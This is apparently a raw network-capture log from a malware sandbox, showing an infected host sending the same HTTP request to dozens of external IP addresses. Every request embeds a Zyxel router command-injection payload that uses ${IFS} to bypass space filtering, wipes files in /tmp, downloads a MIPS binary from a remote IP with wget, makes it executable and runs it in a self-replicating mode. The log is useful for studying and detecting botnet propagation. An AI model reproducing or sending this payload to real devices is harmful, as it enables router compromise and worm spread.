                                                Jan 12, 2024 18:24:40.996372938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5734192.168.2.1343326213.4.171.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.996411085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5735192.168.2.133378634.39.252.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.996474028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5736192.168.2.1352804221.59.230.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.996536016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5737192.168.2.1337792126.212.163.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.996582985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5738192.168.2.1343610185.25.194.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.996642113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5739192.168.2.1333274194.8.174.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.996680975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5740192.168.2.13379369.78.61.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.996715069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5741192.168.2.135943887.75.127.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.996784925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5742192.168.2.135125680.38.220.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.996814966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5743192.168.2.135380063.167.125.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.996921062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5744192.168.2.1349854194.78.44.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.996958017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5745192.168.2.1333354171.38.68.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.996973038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5746192.168.2.1349626174.170.120.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.997045040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5747192.168.2.133844082.20.243.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.997087002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5748192.168.2.1340748198.212.207.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.997179985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5749192.168.2.135577225.202.163.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.997291088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5750192.168.2.1349550136.71.5.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.997327089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5751192.168.2.1355052141.85.254.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.997391939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5752192.168.2.135384247.65.154.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.997471094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5753192.168.2.1341876194.13.135.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.997505903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5754192.168.2.1359648181.69.224.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.997550011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5755192.168.2.134734468.8.84.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.997610092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5756192.168.2.1336516197.7.81.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.997683048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5757192.168.2.134818635.159.183.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.997720003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5758192.168.2.1346912148.96.229.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.997797012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5759192.168.2.1353670163.215.64.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.997844934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5760192.168.2.133555296.127.178.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.997910976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5761192.168.2.1334522212.48.16.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.997975111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5762192.168.2.133524065.186.125.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.998022079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5763192.168.2.1354180132.17.222.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.998060942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5764192.168.2.1348924216.58.158.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.998126984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5765192.168.2.135335099.216.47.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.998191118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5766192.168.2.1338786145.110.4.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.998301029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5767192.168.2.1354982212.161.246.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.998369932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5768192.168.2.1350758157.105.18.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.998467922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5769192.168.2.1356264149.185.80.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.998505116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5770192.168.2.133506284.37.55.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.998524904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5771192.168.2.135620018.99.90.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.998593092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5772192.168.2.1340112189.189.65.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.998663902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5773192.168.2.133504420.77.86.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.998722076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5774192.168.2.1343714208.64.153.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.998795986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5775192.168.2.1344236185.235.30.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.998845100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5776192.168.2.1354898210.150.76.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.998878956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5777192.168.2.1340558139.16.27.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.998931885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5778192.168.2.1345754133.219.233.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.998999119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5779192.168.2.134666820.145.38.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.999073982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5780192.168.2.1345884210.108.242.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.999108076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5781192.168.2.1348532160.145.132.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.999136925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5782192.168.2.1354192168.248.210.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.999231100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5783192.168.2.1334004187.72.155.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.999233961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5784192.168.2.133812057.220.186.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.999284983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5785192.168.2.1347150167.211.211.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.999351025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5786192.168.2.1336730180.237.146.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.999433041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5787192.168.2.1337034123.25.223.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.999507904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5788192.168.2.1343004129.185.116.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.999545097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5789192.168.2.134245677.35.124.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.999600887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5790192.168.2.133747467.225.255.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.999639034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5791192.168.2.1351394116.14.10.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.999711037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5792192.168.2.1358344118.170.207.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.999764919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5793192.168.2.1356484191.219.160.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.999785900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5794192.168.2.133853690.70.137.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.999845982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5795192.168.2.13576548.210.88.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:40.999877930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5796192.168.2.1333100166.30.97.191443
                                                TimestampBytes transferredDirectionData
